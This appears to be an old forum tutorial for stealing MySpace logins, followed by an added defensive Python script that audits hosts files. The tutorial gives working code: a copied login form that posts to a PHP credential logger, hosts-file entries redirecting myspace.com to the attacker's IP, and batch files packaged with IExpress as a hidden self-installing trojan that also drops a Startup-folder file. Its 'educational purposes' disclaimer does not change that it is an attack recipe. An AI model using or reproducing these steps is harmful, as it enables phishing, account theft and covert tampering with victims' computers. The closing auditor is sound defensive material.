This tutorial gives you the ABILITY to obtain myspace passwords..before i continue i must state that i have no intentions of using my knowledge to actually get myspace passwords AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me, i'm only posting this tut so myspace can get a fix on this problem..
now that i have my disclaimer up i will begin the tutorial.
a brief description: this tutorial combines my and m00nbat's ideas (yes moonbat, your host file thing is involved so props for that). this will require the "Target" to click on an .exe and after that, everything will go the way you want it to be.
ok you're going to need a few things.
1. a server (don't worry it's not as scary as it sounds, i will "provide" one for you)
2. some batch file knowledge
3. some HTML knowledge
ok, to explain what we are going to do, we will basically tell the computer that when you type in "myspace.com" it will take them to your phishing site of myspace.com VIA ip address thus the name "hijacking" comes to play. in order to do this we will have to replace their host file with your modified version. and to cover our *****s of us being in that computer, we will delete everything we have added/modified. now to begin
first off we need to have a phishing site for myspace, so let's go to myspace.com. right click the page (anywhere) and click view source. we should get a bunch of lovely html sooo assuming you're in notepad (if not copy and paste the code to notepad) we go to edit then find and we type in the find box (don't forget the "<") it should take us to a nice little string
like so
Code:
<form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
so now we edit the code so that everything that goes in the form, appears in our server (aka your computer)
Code:
<form action="login.php" method="get" id="LoginForm" name="aspnetForm">
after you edit this save it as index.html on to your desktop
you may be wondering what login.php is, well we have to create that. the php should just have this
Code:
<?php
header("Location: http://home*4.myspace.com/index.cfm?fuseaction=user");
$handle = fopen("out.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
all this does is it "retrieves" whatever things go in the html form you receive in a pretty out.txt and it also redirects them to the real site.
now that we have all of this set up, we begin to install our server. i personally use XAMPP just because i believe it's pretty good and simple. you can get xampp [URL="http://www.apachefriends.org/en/xampp-windows.html"]HERE[/URL] and download the installer. make sure you select the three services when you install xampp =)
once you've done that just install everything and head to your installation directory (default is C:\xampp) once there go to htdocs and open up your internet browser.
in the address bar type in localhost and it should take you to a xampp page. if it doesn't then there's something wrong with your installation, if it does then delete everything in the htdocs and place index.html and login.php in the folder.
now re***** your web browser and you should see the magical myspace page, now just type anything in the username and password field and you should end up in the REAL myspace page. check your htdocs folder and there should be an out.txt with what you have put inside those fields, this means IT WORKS so let's proceed on editing the host file in "C:\WINDOWS\system*2\drivers\etc" (etc is in fact a folder)
we now copy and paste it on to your desktop. close etc and open up notepad and open up the host file with notepad by just dragging and dropping the host file on to notepad. we should get something like this
Code:
# Copyright (c) ****-**** Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# *02.54.*4.*7 rhino.acme.com # source server
# *8.25.6*.*0 x.acme.com # x client host
*27.0.0.* localhost
we will now add your ip and besides it, put myspace.com as many ways as possible so it would look like
Code:
# Copyright (c) ****-**** Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# *02.54.*4.*7 rhino.acme.com # source server
# *8.25.6*.*0 x.acme.com # x client host
*27.0.0.* localhost
*2.*4.56.7 myspace.com
*2.*4.56.7 www.myspace.com
*2.*4.56.7 http://myspace.com
*2.*4.56.7 http://www.myspace.com
*2.*4.56.7 myspace
*2.*4.56.7 is your ip so if your ip address was 24.*0.78.7* then you'd replace *2.*4.56.7 with 24.*0.78.7*. if you don't know what your ip address is, then go to whatismyip.com and it should tell you in big black letters what your ip address is. now save and exit the host file and open up notepad again. we will now inject notepad into the target system so we will add this to our batch file
Code:
@echo off
DEL C:\WINDOWS\system*2\drivers\etc\host
MOVE "host" "C:\WINDOWS\system*2\drivers\etc"
MOVE "stop.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
save this as start.bat and make it into an exe using the bat to exe converter found [URL="http://www.all-nettools.com/forum/showthread.php?t=6*0*"]HERE[/URL] at the end of the page.
we will now create the "stop.exe" which really is stop.bat converted into an exe file
Code:
@echo off
DEL C:\WINDOWS\system*2\drivers\etc\host
DEL C:\Documents and Settings\All Users\Start Menu\Programs\Startup\stop.exe
save it as stop.bat and convert it to exe.
now we should have
host
start.exe
stop.exe
now we go to start->run->iexpress
now create a new self extraction then click next
select extract and install (the first choice Buzzo) then next
give it a good looking title then next
then no prompt then next
no license..next
ah now we add our host, start.exe and stop.exe into this wonderful white box and click next
on the box that says install program select start.exe then next, we don't need anything for the bottom
select hidden then next
no message, next
now check hide process animation from user and click browse to save it and give it a good name like above..next
no restart, next
don't save if you do then save i don't care, next
then create the file and now you should have the file finished..all you have to do is get your victim to open it, and every time they go to myspace, it will show your server's page instead and when they type in anything in those username and password fields, it will go to your out.txt.
have fun!!!
keep in mind to always have your computer on or else your server won't work
REMEMBER THAT IF YOU'RE BEHIND A ROUTER, FORWARD PORT 80 TO YOUR COMPUTER!!!!!!!!!!!!!!!!!!!!!!!!
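
From the defender's side, the hosts-file change described above is the durable artifact to look for: a well-known site pinned to a non-loopback address, sometimes with a URL typed where a hostname belongs. The auditor below is an added example, not part of the original post; the function name `audit_hosts`, the watch list and the sample file (which uses a documentation-range address) are constructed for illustration.

```python
import ipaddress
import sys

# Assumed watch list: domains that should always resolve through DNS.
WATCHED = {"myspace.com"}

# Constructed sample; 203.0.113.0/24 is a reserved documentation range.
SAMPLE = """\
# constructed sample hosts file
127.0.0.1       localhost
203.0.113.10    myspace.com
203.0.113.10    www.myspace.com
203.0.113.10    http://myspace.com
203.0.113.10    myspace
"""

def audit_hosts(text, watched=WATCHED):
    """Return (line_no, reason, raw_line) findings for hosts-file text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            findings.append((no, "unparseable address", raw))
            continue
        for name in fields[1:]:
            host = name.lower().rstrip(".")
            if "://" in host:                 # a URL is never a valid hostname
                findings.append((no, "URL in hostname column", raw))
                host = host.split("://", 1)[1]
            if ip.is_loopback or ip.is_unspecified:
                continue                      # usual localhost / blocklist style
            if any(host == d or host.endswith("." + d) for d in watched):
                findings.append((no, "watched domain pinned to %s" % ip, raw))
            else:
                findings.append((no, "non-loopback override", raw))
    return findings

if __name__ == "__main__":
    # Audit the file given on the command line, or the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for no, reason, raw in audit_hosts(text):
        print("line %d: %s: %s" % (no, reason, raw.strip()))
```

Pairing a check like this with file-integrity monitoring on the hosts file and the all-users Startup folder covers both changes the batch files above make.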